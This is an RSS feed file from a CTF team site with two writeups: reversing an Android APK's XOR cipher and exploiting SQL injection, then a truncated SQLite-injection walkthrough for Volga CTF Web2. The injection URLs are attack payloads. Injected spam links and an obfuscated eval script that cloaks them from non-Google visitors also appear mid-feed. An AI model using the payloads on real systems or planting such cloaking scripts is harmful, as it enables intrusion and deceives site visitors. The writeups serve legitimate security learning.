-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathrss.xml
778 lines (739 loc) · 164 KB
/
rss.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="https://ctfcrew.org" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title>BalalaikaCr3w</title>
<link>https://ctfcrew.org</link>
<description></description>
<language>en</language>
<item>
<title>Isomni'hack 2017 teaser mindreader writeup</title>
<link>https://ctfcrew.org/writeup/104</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/mobile">mobile</a></div><div class="field-item odd"><a href="/categories/web">web</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/38">Isomni&#039;hack teaser 2017</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>&nbsp;</p>
<p><em>Machines infected lots of Android smartphones and try to collect information on human behaviour... Have a look to their application and try to steal information on them.</em></p>
<p>So we have an android application file. Let's decompile its code!</p>
<p>First, we need to translate Dalvik bytecode to equivalent Java bytecode. I used <a href="https://github.com/google/enjarify">enjarify</a> for this:</p>
<pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
➜ git clone https://github.com/google/enjarify
➜ cd enjarify
➜ ./enjarify.sh ../mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk -o ../app.jar</pre>
<p>And now we can decompile java bytecode by using <a href="http://jd.benow.ca">jd-gui</a>. Let's see what we have.</p>
<p>The first intresting function is&nbsp;<em>readMind</em>:</p>
<pre class="brush: java; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
static String device = "000000000000000";
...
public String readMind()
{
localObject1 = device;
String str1 = jsonify((String)localObject1); // encode to json {"device": "..."}
byte[] arrayOfByte1 = str1.getBytes();
byte[] arrayOfByte2 = new byte[arrayOfByte1.length];
localObject1 = getApplicationContext();
encrypt((Context)localObject1, arrayOfByte1, arrayOfByte2);
int i = 0;
localObject1 = null;
String str2 = Base64.encodeToString(arrayOfByte2, 0);
... // Send HTTP-request with str2 as parameter to server
}
</pre>
<p>&nbsp;</p>
<p>Here we can see that string with json <em>{"device": "000000000000000"}</em> is encrypted, encoded to base64 and then sent to the server. And function <em>encrypt</em> looks like this:</p>
<pre class="brush: java; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
public native int encrypt(Context paramContext, byte[] paramArrayOfByte1, byte[] paramArrayOfByte2);</pre>
<p>And above this we have lines:</p>
<pre class="brush: java; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
static
{
System.loadLibrary("native-lib");
}
</pre>
<p>As we can see <em>encrypt</em>&nbsp;function is implemented in library <em>libnative-lib.so</em>. Let's find it.</p>
<p>First, we should extract application files. I used&nbsp;<a href="https://ibotpeaches.github.io/Apktool">apktool</a>&nbsp;for this:</p>
<pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
➜ apktool d mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk
➜ cd mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516/lib/armeabi
➜ file libnative-lib.so
libnative-lib.so: ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /system/bin/linker, BuildID[sha1]=f092f48095eec3cb0c6dd8eddec9994c2b3e01b4, stripped
</pre>
<p>Now we should find `encrypt` function in this library. As `encrypt` is called from java code it seems that it should use JNI (Java Native Interface). So, according to <a href="https://docs.oracle.com/javase/1.5.0/docs/guide/jni/spec/design.html">Oracle documentation</a> name of <em>encrypt</em>&nbsp;function &nbsp;in library will be like <em>Java_ch_scrt_hiddenservice_MainActivity_encrypt</em>&nbsp;(<em>ch.scrt.hiddenservice</em>&nbsp;- name of application package, <em>MainActivity</em>&nbsp;- name of class).</p>
<p>In Ida Pro this function looks like this:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int a1, int a2, int a3, int a4, int a5)
{
int v5; // ST1C_4@1
int v6; // r4@1
int v7; // r6@1
unsigned int v8; // r0@1
char v9; // r5@3
int v10; // r1@3
int v12; // [sp+8h] [bp-34h]@1
int v13; // [sp+10h] [bp-2Ch]@1
int v14; // [sp+14h] [bp-28h]@1
int v15; // [sp+18h] [bp-24h]@2
int v16; // [sp+1Ch] [bp-20h]@1
int v17; // [sp+20h] [bp-1Ch]@1
char v18; // [sp+24h] [bp-18h]@1
__int16 v19; // [sp+28h] [bp-14h]@1
char v20; // [sp+2Ah] [bp-12h]@1
char v21; // [sp+2Bh] [bp-11h]@1
int v22; // [sp+2Ch] [bp-10h]@4
v14 = a4;
v5 = a3;
v6 = a1;
v13 = a1;
v7 = 0;
v18 = 0;
v12 = (*(int (**)(void))(*(_DWORD *)a1 + 684))();
v17 = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)v6 + 736))(v6, v14, &amp;v18);
v16 = (*(int (__fastcall **)(int))(*(_DWORD *)v6 + 736))(v6);
sub_4A68();
v8 = sub_4AC4(v6, v5);
v19 = v8;
v20 = v8 &gt;&gt; 16;
v21 = HIBYTE(v8);
if ( v12 &gt; 0 )
{
v15 = dword_1D0F8;
do
{
v9 = *(_BYTE *)(v17 + v7);
j_j_j___aeabi_idivmod(v7, 80);
*(_BYTE *)(v16 + v7) = *((_BYTE *)&amp;v19 + v7 % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
++v7;
}
while ( v12 != v7 );
}
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)v13 + 768))(v13, v14, v17, 0);
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)v13 + 768))(v13, a5, v16, 0);
if ( _stack_chk_guard != v22 )
j_j___stack_chk_fail();
return 0;
}
</pre>
<p>Also according to JNI Oracle documentation the first argument of this function is <em>JNIEnv* env</em>&nbsp;and the second is <em>jobject obj</em>. The rest of arguments is arguments from java i.e. <em>Context paramContext, byte[] paramArrayOfByte1, byte[] paramArrayOfByte2)</em>. Now our function looks like this:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int env, int obj, int paramContext, int paramArrayOfByte1, int paramArrayOfByte2)
{
...
paramArrayOfByte1_1 = paramArrayOfByte1;
paramContext_1 = paramContext;
env_1 = env;
env_2 = env;
v7 = 0;
v18 = 0;
v12 = (*(int (**)(void))(*(_DWORD *)env + 684))();
v17 = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + 736))(env_1, paramArrayOfByte1_1, &amp;v18);
v16 = (*(int (__fastcall **)(int))(*(_DWORD *)env_1 + 736))(env_1);
sub_4A68();
v8 = sub_4AC4(env_1, paramContext_1);
v19 = v8;
v20 = v8 &gt;&gt; 16;
v21 = HIBYTE(v8);
if ( v12 &gt; 0 )
{
v15 = dword_1D0F8;
do
{
v9 = *(_BYTE *)(v17 + v7);
j_j_j___aeabi_idivmod(v7, 80);
*(_BYTE *)(v16 + v7) = *((_BYTE *)&amp;v19 + v7 % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
++v7;
}
while ( v12 != v7 );
}
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + 768))(env_2, paramArrayOfByte1_1, v17, 0);
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + 768))(env_2, paramArrayOfByte2, v16, 0);
if ( _stack_chk_guard != v22 )
j_j___stack_chk_fail();
return 0;
}
</pre>
<p>Better but still not readable because of many function calls like <em>(*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + 736))</em>&nbsp; i.e. by offset in&nbsp;<em>JNIEnv *env</em>. We need to find function names by their offsets in <em>JNIEnv</em>. All JNI functions are listed <a href="http://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/functions.html">here</a>. But I found cool Ida script <a href="https://github.com/trojancyborg/IDA_JNI_Rename">IDA_JNI_Rename</a>&nbsp;on GitHub. After using it our function will look like this:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int env, int obj, int paramContext, int paramArrayOfByte1, int paramArrayOfByte2)
{
...
paramArrayOfByte1_1 = paramArrayOfByte1;
paramContext_1 = paramContext;
env_1 = env;
env_2 = env;
v7 = 0;
v18 = 0;
v12 = (*(int (**)(void))(*(_DWORD *)env + jni_GetArrayLength))();
v17 = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(
env_1,
paramArrayOfByte1_1,
&amp;v18);
v16 = (*(int (__fastcall **)(int))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(env_1);
sub_4A68();
v8 = sub_4AC4(env_1, paramContext_1);
v19 = v8;
v20 = v8 &gt;&gt; 16;
v21 = HIBYTE(v8);
if ( v12 &gt; 0 )
{
v15 = dword_1D0F8;
do
{
v9 = *(_BYTE *)(v17 + v7);
j_j_j___aeabi_idivmod(v7, 80);
*(_BYTE *)(v16 + v7) = *((_BYTE *)&amp;v19 + v7 % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
++v7;
}
while ( v12 != v7 );
}
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
env_2,
paramArrayOfByte1_1,
v17,
0);
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
env_2,
paramArrayOfByte2,
v16,
0);
if ( _stack_chk_guard != v22 )
j_j___stack_chk_fail();
return 0;
}
</pre>
<p>Now we can assume that <em>paramArrayOfByte1</em>&nbsp;is <em>plaintext</em>&nbsp;and <em>paramArrayOfByte2</em>&nbsp;is <em>ciphertext</em>. Let's do some renames:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
int __fastcall Java_ch_scrt_hiddenservice_MainActivity_encrypt(int env, int obj, int paramContext, int plaintext, int ciphertext)
{
...
paramArrayOfByte1_1 = plaintext;
paramContext_1 = paramContext;
env_1 = env;
env_2 = env;
i = 0;
v18 = 0;
plaintext_len = (*(int (**)(void))(*(_DWORD *)env + jni_GetArrayLength))();
plaintext_bytes = (*(int (__fastcall **)(int, int, char *))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(
env_1,
paramArrayOfByte1_1,
&amp;v18);
ciphertext_bytes = (*(int (__fastcall **)(int))(*(_DWORD *)env_1 + jni_GetByteArrayElements))(env_1);
sub_4A68();
some_int = sub_4AC4(env_1, paramContext_1);
some_int_1 = some_int;
v20 = some_int &gt;&gt; 16;
v21 = HIBYTE(some_int);
if ( plaintext_len &gt; 0 )
{
v15 = dword_1D0F8;
do
{
v9 = *(_BYTE *)(plaintext_bytes + i);
j_j_j___aeabi_idivmod(i, 80);
*(_BYTE *)(ciphertext_bytes + i) = *((_BYTE *)&amp;some_int_1 + i % 4) ^ *(_BYTE *)(v15 + v10) ^ v9;
++i;
}
while ( plaintext_len != i );
}
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
env_2,
paramArrayOfByte1_1,
plaintext_bytes,
0);
(*(void (__fastcall **)(int, int, int, _DWORD))(*(_DWORD *)env_2 + jni_ReleaseByteArrayElements))(
env_2,
ciphertext,
ciphertext_bytes,
0);
if ( _stack_chk_guard != v22 )
j_j___stack_chk_fail(_stack_chk_guard - v22);
return 0;
}
</pre>
<p>So, the encryption algoritm is like this:</p>
<pre class="brush: cpp; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
int some_int = sub_4AC4(env_1, paramContext_1);
int dword_1D0F8[80] = ?;
for (i = 0; i &lt; plaintext_len; i++) {
ciphertext[i] = plaintext[i] ^ some_int[i % 4] ^ dword_1D0F8[i % 80];
}
</pre>
<p>Cool, but we don't have <em>some_int</em>&nbsp;and <em>dword_1D0F8</em>. At this point I decided that it would be easier to place a breakpoint here and just copy this values from memory because I'm lazy :) . To do this I used android emulator <em>armeabi-v7a</em>:</p>
<p>&nbsp;Start emulator with the command:</p>
<pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
➜ emulator -avd Nexus_5_API_24
</pre>
<p>Then install application by drag'n'drop apk-file to it.</p>
<p><img alt="" height="569" src="/sites/default/files/writeups/images/emulator.png" width="892" /></p>
<p>After that I setup Ida Dalvik debugger as described <a href="https://www.hex-rays.com/products/ida/support/tutorials/debugging_dalvik.pdf">here</a>&nbsp;and place breakpoint on <em>encrypt</em>&nbsp;in <em>readMind</em>&nbsp;function:</p>
<p><img alt="" height="405" src="/sites/default/files/writeups/images/dalvik_breakpoint.png" width="1200" /></p>
<p>Then I opened another Ida instance with `libnative-lib.so`, setup remote android debugger as described <a href="https://finn.svbtle.com/remotely-debugging-android-binaries-in-ida-pro">here</a>&nbsp;and place breakpoint before encryption started:</p>
<p><img alt="" height="694" src="/sites/default/files/writeups/images/arm_breakpoint.png" width="990" /></p>
<p>After that I ran Ida with Dalvik debugger and wait until program stopped and then I ran remote android debugger and attached to application process:</p>
<p style="text-align: center;"><img alt="" height="622" src="/sites/default/files/writeups/images/attach.png" width="581" /></p>
<p>Next I press continue in first Ida instance (Dalvik debugger) and wait until breakpoint fires in second instance.</p>
<p><img alt="" height="349" src="/sites/default/files/writeups/images/break.png" width="1200" /></p>
<p>Ok, let's just find values of <em>some_int</em>&nbsp;and dword_1D0F8.</p>
<p><em>dword_1D0F8</em>&nbsp;(started from <em>7E 66 31 05</em>):</p>
<p style="text-align: center;"><img alt="" height="192" src="/sites/default/files/writeups/images/hex.png" width="491" /></p>
<p>and <em>some_int = 0xb1342c3a</em>:</p>
<p style="text-align: center;"><img alt="" height="197" src="/sites/default/files/writeups/images/stack.png" width="333" /></p>
<p>Ok, now we can rewrite encrypion in python:</p>
<pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
import json
import base64
table = [
0x7e, 0x66, 0x31, 0x05, 0x11, 0x22, 0x2b, 0x1f,
0x07, 0x74, 0x58, 0x19, 0x21, 0x16, 0x17, 0x05,
0x56, 0x52, 0x09, 0x22, 0x7f, 0x61, 0x25, 0x1f,
0x25, 0x13, 0x32, 0x33, 0x2a, 0x32, 0x32, 0x22,
0x28, 0x51, 0x13, 0x27, 0x5b, 0x62, 0x26, 0x1e,
0x20, 0x01, 0x0f, 0x09, 0x57, 0x1d, 0x14, 0x1e,
0x39, 0x17, 0x1d, 0x19, 0x03, 0x50, 0x12, 0x12,
0x02, 0x62, 0x1a, 0x7a, 0x0f, 0x4f, 0x26, 0x20,
0x02, 0x32, 0x11, 0x11, 0x57, 0x3d, 0x2e, 0x33,
0x0b, 0x14, 0x16, 0x0e, 0x1b, 0x60, 0x1c, 0x02,
]
crc = [ 0x3a, 0x2c, 0x34, 0xb1 ]
def encrypt(p):
c = [0] * len(p)
for i in range(len(p)):
c[i] = chr(ord(p[i]) ^ crc[i % 4] ^ table[i % len(table)])
return "".join(c)
def encode(data):
return base64.b64encode(encrypt(json.dumps(data)))
</pre>
<p>To check it I've intercept HTTP-request from emulator and get:</p>
<pre class="brush: plain; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
GET /?a=1&amp;c=P2hh0V1nfMsfYk6YKwoThFxODaN1fSGeLw8k%2Fw%3D%3D%0A HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.0; sdk_google_phone_armv7 Build/NYC)
Host: mindreader.teaser.insomnihack.ch
Connection: close
</pre>
<p>So, we can check correctness of python script as:</p>
<pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
test_in = '{"device":"000000000000000"}'
test_out = base64.b64decode("P2hh0V1nfMsfYk6YKwoThFxODaN1fSGeLw8k/w==")
assert(encrypt(test_in) == test_out)
</pre>
<p>Script was correct and I decided to try all requests from application:</p>
<pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
URL = "http://mindreader.teaser.insomnihack.ch"
def read_mind(device_id):
data = {
"device": device_id
}
params = {
"a": 1,
"c": encode(data)
}
r = requests.get(URL, params=params)
return r
def sms_send(device_id, date, sender, body):
data = {
"device": device_id,
"date": 0,
"sender": sender,
"body": body
}
params = {
"a": 2,
"c": encode(data)
}
r = requests.get(URL, params=params)
return r
</pre>
<p><em>sms_send</em>&nbsp;request I found in file <em>SMSReceiver.java</em>&nbsp;in JD-GUI.</p>
<p>After playing a little bit with this two requests I found that parameter sender in <em>sms_send</em>&nbsp;is vulnerable to SQL injection (time-based). So after gettting all nessesary table names and column names I got a flag:</p>
<pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">
➜ python solve.py
INS{N00bSmS_M1nD_r3ad1nG_TecH}
</pre>
<p>&nbsp;Full script solve.py (LINK!)</p>
<span class="keys_words"><a class="links_good_rands" href="https://www.juzsports.com/">Nike shoes</a> | <a class="links_good_rands" href="https://www.ietp.com/fr/dfejcashop/cheap-price/2021-new-adidas-yeezy-boost-350-v2-ash-stone-gw0089/">2021 New adidas YEEZY BOOST 350 V2 "Ash Stone" GW0089 , Ietp</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div><div class="field field-name-field-file field-type-file field-label-above"><div class="field-label">Attachments:&nbsp;</div><div class="field-items"><div class="field-item even"><span class="file"><img class="file-icon" alt="Binary Data" title="application/octet-stream" src="/modules/file/icons/application-octet-stream.png" /> <a href="https://ctfcrew.org/sites/default/files/writeups/mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk" type="application/octet-stream; length=2457613">mindreader-c3df7f2c966238cc8f4d4327dc1dca8b8b5a69d702f966963c828c965ebbf516.apk</a></span></div><div class="field-item odd"><span class="file"><img class="file-icon" alt="Plain text icon" title="text/plain" src="/modules/file/icons/text-plain.png" /> <a href="https://ctfcrew.org/sites/default/files/writeups/solve.py_0.txt" type="text/plain; length=2961">solve.py.txt</a></span></div></div></div></description>
<pubDate>Mon, 23 Jan 2017 13:46:15 +0000</pubDate>
<dc:creator>russtone</dc:creator>
<guid isPermaLink="false">104 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/104#comments</comments>
</item>
<item>
<title>Web2 writeup</title>
<link>https://ctfcrew.org/writeup/101</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/web">web</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/34">Volga CTF 2015 Quals</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>This is the Web2 problem</p><p>The challenge simply states "Find the key!" and it gives us the challenge URL.<br>The first thing I usually do with a web challenge is to run dirbuster, spider the target and check the it with Nmap.&nbsp;</p><p>Checking with Nmap didn't result in anything interesting. However dirbuster did. I found two interesting folders.<br>The first one is "SecretAdminPanel" and the second one was "logs"</p><p>I visited "SecretAdminPanel" and I saw this.</p><p><img src="/sites/default/files/writeups/images/Screen%20Shot%202015-05-05%20at%209.29.59%20PM.png" alt="" width="1200" height="762"></p><p>So our goal is basically try to access this "SecretAdminPanel".<br>I then visited the "logs" folder, and I found that my IP got logged with the parameters I submitted to the page (so far no params).&nbsp;<br>I visited the SecretAdminPanel again and submitted some data through the GET request&nbsp;</p><p>web2.2015.volgactf.ru/SecretAdminPanel?test=test</p><p>I saw this message: "Don't attempt to hack, all requests will be logged."&nbsp;<br>Well this, in CTFs, This message simply means: HACK from here.</p><p>At the beginning I though that we will have SQLi in the INSERT statement in our request. I thought it will SQLi in the IP by injecting in the X-Forwarded-For or Client-IP request Headrs.<br>I tried SQLi there but didn't get any result.&nbsp;<br><br>Then probably in the params.&nbsp;<br>I tried the following request:&nbsp;http://web2.2015.volgactf.ru/SecretAdminPanel?test=test%27<br>and I got&nbsp;<strong>Error:</strong>&nbsp;unrecognized token: "";}')"<br>Interesting we have some errors available. looks like SQLi and my request was NOT logged. This means we probably had SQLi error and the request didn't finish processing due to the error.<br>I tried this one to double-check<br>http://web2.2015.volgactf.ru/SecretAdminPanel?test=test%27%27<br>and I got no errors and the request got logged perfectly.&nbsp;<br><br><strong>Exploitation:&nbsp;</strong><br>Now it is the time to exploit. I managed to know that th DBMS was sqlite. So this what I want to exploit: a SQLite database.&nbsp;<br>I am injecting in an insert statement and I am injecting in the last column.&nbsp;<br>I believe that the query in the backend was something like<br><br>query = INSERT INTO logs (IP, PARAMS) VALUES ($ip, $params);</p><p>I usually when I have a SQLi bug and errors are enabled. I try to inject in different places in the query to see the errors of the database. As a result of seeing the errors I can see part of the query in the backend.<br>So I injected in this part of the query string&nbsp;<br>http://web2.2015.volgactf.ru/SecretAdminPanel?test%27=test<br>and that was the result&nbsp;<br><strong>Error:</strong>&nbsp;near "";s:4:"": syntax error<br>what we see here part of the INSERT query but we can see s:4: and this is part of a serialized string in PHP.<br>So probably the code in the backend something like this&nbsp;<br><br>$params = serialize($_GET)<br>query = "INSERT INTO logs (IP, PARAMS) VALUES ($'ip', '$params');"</p><p>now we want to have our injection with the serialization. I frist looked for the string concatenation operator in the SQLite to concatenate the result I want to see with the params. The string concatenation operator was "||"/<br>I tried this request first&nbsp;<br>http://web2.2015.volgactf.ru/SecretAdminPanel?test=test'||(Select "a")||'</p><p>The request worked successfully no SQL errors, this means our injection was correct.&nbsp;<br>However I checked the logs page and that was the result&nbsp;</p><p>array(2) {</p><p>&nbsp; ["ip"]=&gt;</p><p>&nbsp; string(12) "MY_IP"</p><p>&nbsp; ["params"]=&gt;</p><p>&nbsp; bool(false)</p><p>&nbsp;</p><p>}</p><p>Why is this ?? It looks like that PHP couldn't deserialize the column correctly.&nbsp;<br>What they do in the backend something similar to this&nbsp;<br><br>SELECT IP, params from logs where IP = MyIP;<br>$params = unserialize(params)<br>var_dump($params)</p><p>so we have a problem in deserializing our data.&nbsp;<br>This is true because our injection was something like<br>?test=test'||(Select "a")||'</p><p>So the serialized string:&nbsp;'a:1:{s:4:"test";s:22:"test'||(Select "a")||'";}'<br>and the string stored in the database: 'a:1:{s:4:"test";s:22:"testa";}'<br>This&nbsp;discrepancy between the INSERT statement and what stores in the database cause this error.</p><p>To solve this, I used something like repeat and substring functions in sqlite to have valid serialized string and stored correctly in the database.&nbsp;<br><br>That was my final query&nbsp;<br>http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28SELECT%28substr%28group_concat%28name%29,0,5%29%29FROM%28sqlite_master%29%29||%28select%28replace%28substr%28quote%28zeroblob%28%28130%2b1%29/2%29%29,3,130%29,%220%22,%22a%22%29%29%29||%27</p><p><br>Executing this query will return us the names of tables in the database.<br>This query to extract the content of the params column in the database<br><br>http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28SELECT%28hex%28substr%28group_concat%28params%29,100,61%29%29%29FROM%28logs%29%29||%28select%28replace%28substr%28quote%28zeroblob%28%289%2b1%29/2%29%29,3,9%29,%220%22,%22a%22%29%29%29||%27</p><p>I assumed we might get the params that the admin used to login into this page and then we will get the flag. However, it was not that easily.&nbsp;<br>Unfortunately the data inside the database was only mine, which means that each use has its own copy of the database.<br>The flag wont be in the database so we need to think of something else.&nbsp;<br><br>In the cookies we have this interesting cookie.&nbsp;PHPSESS=%7B%22isAdmin%22%3Afalse%7D0afb5cf5c7d66587da7c811767250458; expires=Fri, 08 May 2015 18:08:16 GMT; path=/; domain=.web2.2015.volgactf.ru; HttpOnly</p><p>Maybe to get the flag, we need to get the cookie salt used to form this cookie and form the valid cookie where isAdmin:true<br>another member in the team suggested to have the serialized Exception object, and when this object gets deseialized we will see our stacktrace and we might get something useful.&nbsp;<br><br>I used this query to add the exception object into the database.&nbsp;<br><br></p><p><span data-rz-clipboard="true"><a class="vt-p" style="text-decoration: underline;" 